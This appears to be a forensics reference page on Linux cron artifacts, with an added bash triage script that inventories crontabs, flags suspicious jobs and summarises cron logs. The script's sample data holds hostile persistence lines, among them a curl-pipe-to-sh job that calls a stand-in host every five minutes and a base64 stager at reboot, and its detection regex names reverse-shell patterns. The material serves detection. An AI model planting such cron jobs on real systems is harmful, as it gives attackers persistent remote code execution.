Linux Cron & Scheduler Artifacts
Time-based job scheduler configuration (system and per-user crontabs, drop-in directories) plus the execution log written by cron/anacron. Key artifact for persistence detection on Linux servers.
Where to find it
Default filesystem paths; collect them with your preferred live-response or disk-image tooling. Locations differ by distribution: Debian-family systems keep per-user crontabs under /var/spool/cron/crontabs/ and log cron through syslog to /var/log/syslog (or only to the journal), while RHEL-family systems keep them directly under /var/spool/cron/ and log to /var/log/cron. System crontabs (/etc/crontab and /etc/cron.d/) carry a user field after the schedule; per-user spool crontabs do not.
- /etc/crontab
- /etc/cron.d/
- /etc/cron.hourly/
- /etc/cron.daily/
- /etc/cron.weekly/
- /etc/cron.monthly/
- /etc/anacrontab (with /var/spool/anacron/, whose timestamp files record when each anacron job last ran)
- /etc/cron.allow and /etc/cron.deny (who may install a crontab)
- /var/spool/cron/crontabs/ (Debian-family) or /var/spool/cron/ (RHEL-family)
- /var/log/cron
- /var/log/cron.log
- /var/log/syslog or the systemd journal where cron has no file of its own
Forensic significance
Common scenarios in which this artifact becomes decisive evidence.
- Persistence — attacker-installed cron job calling back to C2, typically on a short interval (every few minutes, or @reboot) with a download-and-execute one-liner
- Identifying scheduled exfiltration windows that match traffic anomalies; the CMD lines in the cron log give the exact minute each job fired
- Detecting sudden additions to /etc/cron.d or the spool directory after a known intrusion
- Comparing crontab modification times against admin change tickets; check ctime alongside mtime, since touch can backdate mtime but ctime changes only through the kernel, and crontab(1) rewrites the spool file so its timestamps reflect the last edit
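The following shell script is an added example, not code from this page or from unJaena AI. It turns the paths and scenarios above into one triage pass: it inventories the cron files under a live root or a mounted image with mtime, ctime, owner and SHA-256; parses system and per-user crontab lines (the user field exists only in /etc/crontab and /etc/cron.d/); flags commands matching download-and-execute, base64-stager and staging-directory shapes; and counts CMD lines from the cron log per user and command so a job firing at the cadence of a traffic anomaly stands out. The heuristic regex, the sample crontab lines, the 198.51.100.23 address and the log lines are constructed assumptions, and the inventory step assumes GNU stat and sha256sum.

```shell
#!/usr/bin/env bash
# Added example, not code from this page or from unJaena AI. Triage cron persistence:
#   cron_inventory ROOT / cron_triage KIND FILE (KIND = system|user) / cron_log_summary LOG
# The regex and all sample data are constructed assumptions, not taken from the page.

# Download-and-execute, base64 stagers, world-writable staging dirs, reverse shells. Tune per site.
CRON_SUSPICIOUS_RE='(curl|wget)[^|]*[|][[:space:]]*(ba)?sh|base64[[:space:]]+(-d|--decode)|/dev/shm/|/tmp/|/var/tmp/|nc[[:space:]]+-e|bash[[:space:]]+-i|/dev/tcp/|python[0-9.]*[[:space:]]+-c'

# List cron files under ROOT as "mtime  ctime  owner  sha256  path". ctime is kept beside mtime
# because touch(1) can backdate mtime but not ctime. Debian and RHEL spool layouts both covered.
cron_inventory() {
    root=${1:-/}
    for p in etc/crontab etc/anacrontab etc/cron.d etc/cron.hourly etc/cron.daily \
             etc/cron.weekly etc/cron.monthly var/spool/cron var/spool/anacron; do
        [ -e "$root/$p" ] || continue
        find "$root/$p" -type f -exec sh -c 'for f in "$@"; do
            printf "%s  %s  %s  %s  %s\n" "$(stat -c %y "$f" | cut -d. -f1)" "$(stat -c %z "$f" | cut -d. -f1)" \
                "$(stat -c %U "$f")" "$(sha256sum "$f" | cut -d" " -f1)" "$f"; done' _ {} +
    done
}

# Split one crontab line into "schedule<TAB>user<TAB>command". KIND=system for /etc/crontab and
# /etc/cron.d/* (user field after the schedule); KIND=user for spool crontabs (user printed as "-").
# Comments, blank lines and variable assignments (SHELL=, PATH=, MAILTO=) produce no output.
cron_parse_line() {
    printf '%s\n' "$2" | awk -v kind="$1" '
        /^[[:space:]]*#/ { next }
        NF == 0 { next }
        /^[[:space:]]*[A-Za-z_][A-Za-z0-9_]*[[:space:]]*=/ { next }
        {
            n = ($1 ~ /^@/) ? 1 : 5          # @reboot, @daily, ... replace the five time fields
            sched = $1; for (i = 2; i <= n; i++) sched = sched " " $i
            user = "-"; if (kind == "system") { n++; user = $n }
            cmd = ""; for (i = n + 1; i <= NF; i++) cmd = cmd (cmd == "" ? "" : " ") $i
            printf "%s\t%s\t%s\n", sched, user, cmd
        }'
}

# Print "FILE<TAB>schedule<TAB>user<TAB>command" for each job whose command matches the regex.
# Exit status 0 only when at least one job was flagged.
cron_triage() {
    kind=$1; file=$2; hits=0
    while IFS= read -r line || [ -n "$line" ]; do
        parsed=$(cron_parse_line "$kind" "$line")
        [ -n "$parsed" ] || continue
        cmd=$(printf '%s\n' "$parsed" | cut -f3-)
        if printf '%s\n' "$cmd" | grep -Eq "$CRON_SUSPICIOUS_RE"; then
            printf '%s\t%s\n' "$file" "$parsed"
            hits=$((hits + 1))
        fi
    done < "$file"
    [ "$hits" -gt 0 ]
}

# Count executions per (user, command) from cron's syslog-format lines, e.g.
# "Mar  3 02:00:01 web1 CRON[4242]: (root) CMD (/usr/local/bin/backup.sh --full)".
# Output "count<TAB>user<TAB>command", most frequent first.
cron_log_summary() {
    awk '
        match($0, /CRON\[[0-9]+\]: \([^)]+\) CMD \(/) {
            cmd = substr($0, RSTART + RLENGTH); sub(/\)[[:space:]]*$/, "", cmd)
            user = $0; sub(/.*CRON\[[0-9]+\]: \(/, "", user); sub(/\).*/, "", user)
            count[user "\t" cmd]++
        }
        END { for (k in count) printf "%d\t%s\n", count[k], k }' "$1" | sort -rn
}

# Constructed sample data (no real system) so the script runs offline.
cron_sample_user_crontab() {
    f=$(mktemp); cat > "$f" <<'EOF'
# m h dom mon dow command
SHELL=/bin/bash
0 2 * * * /usr/local/bin/backup.sh --full
*/5 * * * * curl -s http://198.51.100.23/x.sh | sh
@reboot /bin/bash -c 'echo aGVsbG8K | base64 -d | bash'
EOF
    printf '%s\n' "$f"
}
cron_sample_cron_d() {
    f=$(mktemp); cat > "$f" <<'EOF'
17 * * * * root cd / && run-parts --report /etc/cron.hourly
* * * * * root /dev/shm/.x/update >/dev/null 2>&1
EOF
    printf '%s\n' "$f"
}
cron_sample_log() {
    f=$(mktemp); cat > "$f" <<'EOF'
Mar  3 02:00:01 web1 CRON[4242]: (root) CMD (/usr/local/bin/backup.sh --full)
Mar  3 02:05:01 web1 CRON[4301]: (www-data) CMD (curl -s http://198.51.100.23/x.sh | sh)
Mar  3 02:10:01 web1 CRON[4355]: (www-data) CMD (curl -s http://198.51.100.23/x.sh | sh)
Mar  3 02:15:01 web1 CRON[4410]: (www-data) CMD (curl -s http://198.51.100.23/x.sh | sh)
EOF
    printf '%s\n' "$f"
}

# Demo on the constructed samples; on a real case run e.g. cron_inventory /mnt/evidence first.
u=$(cron_sample_user_crontab); d=$(cron_sample_cron_d); l=$(cron_sample_log)
cron_triage user "$u"; cron_triage system "$d"; cron_log_summary "$l"
rm -f "$u" "$d" "$l"
```

On the samples, cron_triage flags the curl pipeline and the base64 stager in the user crontab and the /dev/shm job in the cron.d file while leaving the backup and run-parts entries alone, and cron_log_summary puts the www-data curl job at the top with three executions five minutes apart. The parser deliberately skips variable assignments so a MAILTO= or PATH= line is never mistaken for a schedule; a PATH override pointing at a writable directory is itself worth a look, but that is a separate check.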
MITRE ATT&CK mapping
Techniques this artifact can help detect or substantiate: T1053.003, Scheduled Task/Job: Cron.
Tools that parse it
unJaena AI and other DFIR tools are commonly used to extract evidence from this artifact.
Related artifacts
systemd Journal (journald)
Binary, structured, indexed log store written by systemd-journald. Holds the kernel ring buffer (what dmesg shows), the stdout/stderr of every unit (service), and trusted fields the daemon records itself (_UID, _GID, _PID, _CMDLINE, _SELINUX_CONTEXT) that the sending process cannot forge. On systems without a separate syslog daemon, cron's per-run CMD lines land here.
Linux Auth Log
Authentication and authorization events emitted by PAM-aware services — sshd logins, sudo invocations, su attempts, screen unlocks, and polkit decisions. The first place to look when scoping a Linux compromise.
Bash Shell History
Per-user record of the interactive commands executed by Bash, written to ~/.bash_history when the interactive shell exits (so a session killed with SIGKILL, or one where the attacker unset HISTFILE, leaves nothing). Setting PROMPT_COMMAND to run `history -a` appends after every command, and HISTTIMEFORMAT adds a per-command timestamp line.
Amcache.hve
Application-compatibility hive introduced in Windows 8 that records PE files the system has encountered (execution is the usual trigger, but mere presence can also create an entry), including the SHA-1 of the first 31 MB of the file, full path, publisher, and first-seen timestamp.